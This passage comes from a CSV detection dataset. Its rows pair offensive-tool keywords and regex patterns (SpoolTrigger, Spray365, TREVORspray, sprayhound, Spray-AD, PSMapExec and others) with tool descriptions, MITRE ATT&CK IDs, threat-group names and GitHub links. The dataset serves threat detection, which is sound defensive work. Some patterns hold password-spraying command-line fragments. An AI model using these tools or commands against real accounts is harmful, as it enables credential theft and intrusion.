T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 
- TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60007" "*SpoolTrigger.x64.dll*",".{0,1000}SpoolTrigger\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens 
- Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60008" "*SpoolTrigger.x86.dl*",".{0,1000}SpoolTrigger\.x86\.dl.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - 
Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60009" "*SpoolTrigger.x86.dll*",".{0,1000}SpoolTrigger\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60010" "*SpoolTrigger\SpoolTrigger.*",".{0,1000}SpoolTrigger\\SpoolTrigger\..{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60011" "*Spray an empty password across the 
Domain*",".{0,1000}Spray\san\sempty\spassword\sacross\sthe\sDomain.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","60014" "*spray* --recon *.* -u *.txt --threads 10*",".{0,1000}spray.{0,1000}\s\-\-recon\s.{0,1000}\..{0,1000}\s\-u\s.{0,1000}\.txt\s\-\-threads\s10.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","60015" "*Spray365.git*",".{0,1000}Spray365\.git.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","60016" "*spray365.py*",".{0,1000}spray365\.py.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","60017" "*spray365_results_*.json*",".{0,1000}spray365_results_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts 
(Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","60018" "*Spray-AD *",".{0,1000}Spray\-AD\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60019" 
"*Spray-AD.cna*",".{0,1000}Spray\-AD\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60020" "*Spray-AD.dll*",".{0,1000}Spray\-AD\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60021" "*SprayAD.exe *",".{0,1000}SprayAD\.exe\s.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","60022" 
"*Spray-AD.exe*",".{0,1000}Spray\-AD\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60023" "*Spray-AD.sln*",".{0,1000}Spray\-AD\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60024" "*Spray-AD\Spray-AD*",".{0,1000}Spray\-AD\\Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60025" "*spraycharles analyze *",".{0,1000}spraycharles\sanalyze\s.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","60026" "*spraycharles gen extras*",".{0,1000}spraycharles\sgen\sextras.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","60027" "*spraycharles 
spray*",".{0,1000}spraycharles\sspray.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","60028" "*sprayhound -*",".{0,1000}sprayhound\s\-.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","60029" "*sprayhound -d *",".{0,1000}sprayhound\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60030" "*sprayhound-master.zip*",".{0,1000}sprayhound\-master\.zip.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","60031" "*Spraying empty passwords*",".{0,1000}Spraying\sempty\spasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60032" "*Spraying usernames as passwords*",".{0,1000}Spraying\susernames\sas\spasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60033" "*Spraying\*-AccountAsPassword-Users.txt*",".{0,1000}Spraying\\.{0,1000}\-AccountAsPassword\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60034" "*Spraying\*-Password-Users.txt*",".{0,1000}Spraying\\.{0,1000}\-Password\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60035" "*SprayingToolkit.git*",".{0,1000}SprayingToolkit\.git.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","60036" "*SprayingToolkit-master*",".{0,1000}SprayingToolkit\-master.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","60037" "*SprayingToolkit-master.zip*",".{0,1000}SprayingToolkit\-master\.zip.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
